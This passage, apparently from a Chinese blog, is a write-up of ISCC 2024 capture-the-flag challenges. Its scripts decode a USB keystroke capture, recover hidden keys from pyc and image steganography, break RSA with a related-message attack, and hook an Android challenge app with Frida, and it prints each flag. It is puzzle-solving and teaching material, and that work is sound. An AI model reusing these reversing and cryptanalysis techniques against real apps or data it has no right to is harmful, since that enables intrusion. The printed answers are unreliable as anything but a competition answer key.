break
fi.close()
normalKeys = {
"04": "a", "05": "b", "06": "c", "07": "d", "08": "e",
"09": "f", "0a": "g", "0b": "h", "0c": "i", "0d": "j",
"0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o",
"13": "p", "14": "q", "15": "r", "16": "s", "17": "t",
"18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y",
"1d": "z", "1e": "1", "1f": "2", "20": "3", "21": "4",
"22": "5", "23": "6", "24": "7", "25": "8", "26": "9",
"27": "0", "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t",
"2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[", "30": "]", "31": "\\",
"32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".",
"38": "/", "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>",
"3e": "<F5>", "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>",
"44": "<F11>", "45": "<F12>"}
shiftKeys = {
"04": "A", "05": "B", "06": "C", "07": "D", "08": "E",
"09": "F", "0a": "G", "0b": "H", "0c": "I", "0d": "J",
"0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O",
"13": "P", "14": "Q", "15": "R", "16": "S", "17": "T",
"18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y",
"1d": "Z", "1e": "!", "1f": "@", "20": "#", "21": "$",
"22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
"28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>",
"2d": "_", "2e": "+", "2f": "{", "30": "}", "31": "|", "32": "<NON>", "33": "\"",
"34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?", "39": "<CAP>", "3a": "<F1>",
"3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>", "40": "<F7>",
"41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
output = []
keys = open('out.txt')
for line in keys:
try:
if line[0] != '0' or (line[1] != '0' and line[1] != '2') or line[3] != '0' or line[4] != '0' or line[
9] != '0' or line[10] != '0' or line[12] != '0' or line[13] != '0' or line[15] != '0' or line[16] != '0' or \
line[18] != '0' or line[19] != '0' or line[21] != '0' or line[22] != '0' or line[6:8] == "00":
continue
if line[6:8] in normalKeys.keys():
output += [[normalKeys[line[6:8]]], [shiftKeys[line[6:8]]]][line[1] == '2']
else:
output += ['[unknown]']
except:
pass
keys.close()
flag = 0
print("".join(output))
for i in range(len(output)):
try:
a = output.index('<DEL>')
del output[a]
del output[a - 1]
except:
pass
for i in range(len(output)):
try:
if output[i] == "<CAP>":
flag += 1
output.pop(i)
if flag == 2:
flag = 0
if flag != 0:
output[i] = output[i].upper()
except:
pass
print('output :' + "".join(output))
#flagpr3550nwardsa2fee6e0
使用pr3550nwardsa2fee6e0密码解密第一层密码,发现还有一层密码猜测是第一层大写PR3550NWARDSA2FEE6E0密码,解开压缩包后发现全部是空文件
直接写个脚本根据提示的时间转换为时间截后减去第一个txt文件得到了t写个循环脚本
import time
import os
os.chdir("C:/Users/Admin/Desktop/3")
dt="2024-10-14 8:00:00"
time1 = time.strptime(dt, "%Y-%m-%d %H:%M:%S")
t = time.mktime(time1)
flag = ""
for i in range(18):
mtime = os.path.getmtime(".%s.txt" % i)
flag+=chr(int(mtime-t))
print('ISCC'+flag+'}')
#ISCCttJpLr7uSlNWmlcsu5}
ISCCttJpLr7uSlNWmlcsu5}
工业互联网模拟仿真数据分析:
第一问:
在某些网络会话中,数据包可能保持固定大小,请给出含有此确定性特征的会话IP地址和数据包字节大小值。
答案:IP地址:XX.XX.XX.XX,XX.XX.XX.XX,…,数值:XX
补充说明:IP顺序从小到大排列,涉及的IP个数由选手自己判断
这两个IP Lengit 不变 所以是192.168.1.2,192.168.1.4,24
第二问:
题目二:通信包数据某些字段可能为确定的,请给出确定字节数值。
2024 是不变的
第三问:
一些网络通信业务在时间序列上有确定性规律,请提供涉及的IP地址及时间规律数值(小数点后两位)
答案:IP地址:XX.XX.XX.XX,XX.XX.XX.XX,…,数值:XX
192.168.1.3,192.168.1.5,0.06
第四问:
一些网络通信业务存在逻辑关联性,请提供涉及的IP地址
答案:XX.XX.XX.XX,XX.XX.XX.XX,…
192.168.1.2,192.168.1.3,192.168.1.6
第五问:
网络数据包往往会添加数据完整性校验值,请分析出数据校验算法名称及校验值在数据包的起始位和结束位(倒数位)
答案:XXXXX,X,X
五个字符的校验算法,先假设是 CRC16 或者 CRC32 倒数位必为1
尝试CRC16 CRC32并尝试0-10为起始位为CRC16,4,1时成功提交
adcca5c2a82064a17a645d35b6b054cd
Number_is_the_key:
The answers to the questions are hidden in the numbers.
查找内容设置为 加粗替换背景为黑色然后宽设置为2 能看到二维码即可QR扫码即可
ISCC{GVTpapvK4URv}
Where_is_the_flag:
The flag is hidden, please find where it is.
因为拿到是pyc文件想到 反编译 网站如下:
https://tool.lu/pyc/ 在线反编译 得到源码:
这里发现少了Key 猜测是pyc隐写,可以想到一个工具:stegosaurus得到key
github:https://github.com/AngelKitty/stegosaurus
https://github.com/AngelKitty/stegosaurus/releases/tag/1.0
根据源码拼接key+n0lve3t6r1s 就是密钥 然后使用CyberChef解密
#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.6
from Crypto.Cipher import AES
import binascii
def decrypt(x, cipher):
key = x + 'n0lve3t6r1s'
try:
aes = AES.new(key.rjust(24, 'A'), AES.MODE_ECB)
cipher = binascii.unhexlify(cipher)
flag = aes.decrypt(cipher).decode()
return flag
return flag
return None
def main():
c = '19c26b345a14cd47256660c4e59bc06e5a690b243d5e7a8124e052f9c696cf7f'
k = input('Please input your key: ')
flag = decrypt(k, c)
if 'flag' in flag:
print('Wow, you find it!!!')
else:
print('Oh no!!!')
if __name__ == '__main__':
main()
ISCC{HRFhOEVnmYaWpCAlQbvv}
FunZip:
P神工具一把嗦
ISCC{5qwr8fmCWBml}
钢铁侠在解密:
这天钢铁侠在自己的相册旁边发现了一张字条,他觉得两个message之间指定有点东西~
一张图和txt txt文件只有n,e,a和明文缺少c猜测在bmp图片隐写中
C1: 4841465525479094858283249913093588336405819692308992568815184984112142418516177281822291700247857313592879124655111450087675853315953121557569119764279557420900019093250258905485330774772156753506410582545416313878424374296480809619953573866895931450358886231958808469996900225946690261432246769242343939498210979161789744523341971605843150719502298366196330610146975380801166194672726386693133975617180349325263716118285867965741579544907574045647520194314620320401553744843164380479971548126593862313635648696740770059135901431993637720626149085420658462322834506181786702083554721226224523151123254278576893159186
C2: 5835938090203268698567584380581310591628277964719453050511131911277282207654259992708764607801816713560015566066119496307687980331966833600989907293172794136413796936766710587427367852306457985731545289398788122273953222283463399254547234781540202329989694132482501212976801751141793449773275904213309398787034948246876351474180337636417790039597932073225708020713286212020748023673701454001021926972023403315819235492701799740801495667705207588139623609095479304089261489994718166209661362014609424890914080703203519320401908642177899542410202249173104050860899924682948417931795056415821349886915984779132050096424
使用silenteye提取c 🆗现在知道了所有的值 编写脚本:
#half-gcd算法
def HGCD(a, b):
if 2 * b.degree() <= a.degree() or a.degree() == 1:
return 1, 0, 0, 1
m = a.degree() // 2
a_top, a_bot = a.quo_rem(x ^ m)
b_top, b_bot = b.quo_rem(x ^ m)
R00, R01, R10, R11 = HGCD(a_top, b_top)
c = R00 * a + R01 * b
d = R10 * a + R11 * b
q, e = c.quo_rem(d)
d_top, d_bot = d.quo_rem(x ^ (m // 2))
e_top, e_bot = e.quo_rem(x ^ (m // 2))
S00, S01, S10, S11 = HGCD(d_top, e_top)
RET00 = S01 * R00 + (S00 - q * S01) * R10
RET01 = S01 * R01 + (S00 - q * S01) * R11
RET10 = S11 * R00 + (S10 - q * S11) * R10
RET11 = S11 * R01 + (S10 - q * S11) * R11
return RET00, RET01, RET10, RET11
def GCD(a, b):
print(a.degree(), b.degree())
q, r = a.quo_rem(b)
if r == 0:
return b
R00, R01, R10, R11 = HGCD(a, b)
c = R00 * a + R01 * b
d = R10 * a + R11 * b
if d == 0:
return c.monic()
q, r = c.quo_rem(d)
if r == 0:
return d
return GCD(d, r)
c1=4841465525479094858283249913093588336405819692308992568815184984112142418516177281822291700247857313592879124655111450087675853315953121557569119764279557420900019093250258905485330774772156753506410582545416313878424374296480809619953573866895931450358886231958808469996900225946690261432246769242343939498210979161789744523341971605843150719502298366196330610146975380801166194672726386693133975617180349325263716118285867965741579544907574045647520194314620320401553744843164380479971548126593862313635648696740770059135901431993637720626149085420658462322834506181786702083554721226224523151123254278576893159186
c2=5835938090203268698567584380581310591628277964719453050511131911277282207654259992708764607801816713560015566066119496307687980331966833600989907293172794136413796936766710587427367852306457985731545289398788122273953222283463399254547234781540202329989694132482501212976801751141793449773275904213309398787034948246876351474180337636417790039597932073225708020713286212020748023673701454001021926972023403315819235492701799740801495667705207588139623609095479304089261489994718166209661362014609424890914080703203519320401908642177899542410202249173104050860899924682948417931795056415821349886915984779132050096424
N=14333611673783142269533986072221892120042043537656734360856590164188122242725003914350459078347531255332508629469837960098772139271345723909824739672964835254762978904635416440402619070985645389389404927628520300563003721921925991789638218429597072053352316704656855913499811263742752562137683270151792361591681078161140269916896950693743947015425843446590958629225545563635366985228666863861856912727775048741305004192164068930881720463095045582233773945480224557678337152700769274051268380831948998464841302024749660091030851843867128275500525355379659601067910067304244120384025022313676471378733553918638120029697
e = 52595
a=1
M1 = 1769169763
M2 = 1735356260
PR.<x>=PolynomialRing(Zmod(N))
g1 = (x*2^32+M1)^e - c1
g2 = (x*2^32+M2)^e - c2
res = GCD(g1,g2)
m = -res.monic().coefficients()[0]
print(bytes.fromhex(hex(m)[2:]))
#flag{{chu_sheng_ru_si_288}}
这里使用SageMath 运行一下代码 python缺少函数 运行会报错。
ISCC{chu_sheng_ru_si_288}
成语学习:
我把学习资料拷贝给你一份
筛选HTTP协议发现一个数据包另存为导出 搜索89504e47 复制下面全部红色即可。
宽高工具一把梭得到压缩包密码:57pmYyWt
解压成功放入HxD发现是数据包修改后缀zip,直接搜flag
Hmacmd5加密 密文,道法自然 密钥:peach
ISCC{1da6e014532415035d397bea9f238feb}
精装四合一:
分离,我们是破碎的;团结,我们将成为神。我们终将在二进制的反复与隐藏之中破解自身的密码
下载得到4个图片,然后使用winhex或者010editor把正常图片数据删去
(即下图中AE 42 60 82及之前的数据)然后得到一系列冗余数据,然后依次打开,异或0xff异或最快速的方法可以使用010editor:十六进制然后点击二进制异或)
然后就是依次把数据提取出来
(他是把一个zip数据,均匀分布到4个文件里,那么我们需要依次读取4个文件)
下面是py脚本生成zip:
fp1 = open('1.png','rb')
fp2 = open('2.png','rb')
fp3 = open('3.png','rb')
fp4 = open('4.png','rb')
fp5 = open('5.zip','wb')
#如果是4b,就是2.png
#如果是03,就是3.png
#如果是04,就是4.png
for i in range(3176):
fp5.write(fp1.read(1))
fp5.write(fp2.read(1))
fp5.write(fp3.read(1))
fp5.write(fp4.read(1))
fp5.write(fp1.read())
from Crypto.Util.number import bytes_to_long, long_to_bytes
import gmpy2
e = 65537
n = 16920251144570812336430166924811515273080382783829495988294341496740639931651
p = 167722355418488286110758738271573756671
q = 100882503720822822072470797230485840381
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
# 读取加密的文件
c = bytes_to_long(open('true_flag.jpeg', 'rb').read())
# 解密
m = pow(c, d, n)
# 将解密后的明文保存到文件
print(long_to_bytes(m))
print(c)
ISCC{N8KQoc6ULLsuIXJ}
Mobile:
Puzzle_Game:
这是一道关于解密的题目,快来试试吧!
使用Frida将脚本注入到Android目标进程,获取到flag
function main() {
Java.perform(function () {
let Myjni = Java.use("com.example.whathappened.MyJNI.Myjni");
Myjni["getstr"].implementation = function () {
let result = this["getstr"]();
console.log(`${result}`);
return result;
};
});
}
setImmediate(main);
爆破flag其余位数
import hashlib
from itertools import product
from string import digits
def get_sha256(s):
return hashlib.sha256(s.encode('utf-8')).hexdigest()
for digits in product(digits, repeat=8):
guess = ''.join(digits) + "gwC9nOCNUhsHqZm"
digest = get_sha256(guess)
if digest ==
'437414687cecdd3526281d4bc6492f3931574036943597fddd40adfbe07a9afa':
print(digest)
print('found', guess)
break
模拟 Receiver 类 方法
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.Random;
public class Test {
private static String combineStrings(String arg1, String arg2) {
return arg1 + arg2;
}
private static byte[] customEncrypt(byte[] arg4, byte[] arg5) {
byte[] v0 = new byte[arg4.length];
int v1;
for(v1 = 0; v1 < arg4.length; ++v1) {
v0[v1] = (byte)(arg4[v1] ^ arg5[v1 % arg5.length]);
}
return v0;
}
public static String encrypt(String arg3, String arg4) {
byte[] v0 = generateSalt(16);
byte[] v3 = customEncrypt(combineStrings(arg3, arg4).getBytes(StandardCharsets.UTF_8), v0);
byte[] v4 = new byte[v0.length + v3.length];
System.arraycopy(v0, 0, v4, 0, v0.length);
System.arraycopy(v3, 0, v4, v0.length, v3.length);
return Base64.getEncoder().encodeToString(v4);
}
public static String encrypt2(String arg3) {
byte[] v3 = arg3.getBytes(StandardCharsets.UTF_8);
int v0 = 0;
int v1;
for(v1 = 0; v1 < v3.length; ++v1) {
v3[v1] = (byte)((v3[v1] + 0x7F) % 0x100);
}
byte[] v1_1 = new byte[v3.length];
while(v0 < v3.length) {
v1_1[v0] = (byte)(v0 % 2 == 0 ? v3[v0] ^ 0x7B : v3[v0] ^ 0xEA);
++v0;
}
return Base64.getEncoder().encodeToString(v1_1);
}
private static byte[] generateSalt(int i) {
byte[] bArr = new byte[i];
new Random(3468L).nextBytes(bArr);
return bArr;
}
public static void main(String[] args) {
System.out.println("ISCC{"+encrypt2(encrypt("04999999", "gwC9nOCNUhsHqZm")).substring(0, 32)+"}");
}
}
ISCC{tS+dAMpEvBi3LrcTiweLJIguyESqHJwY}
2751
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
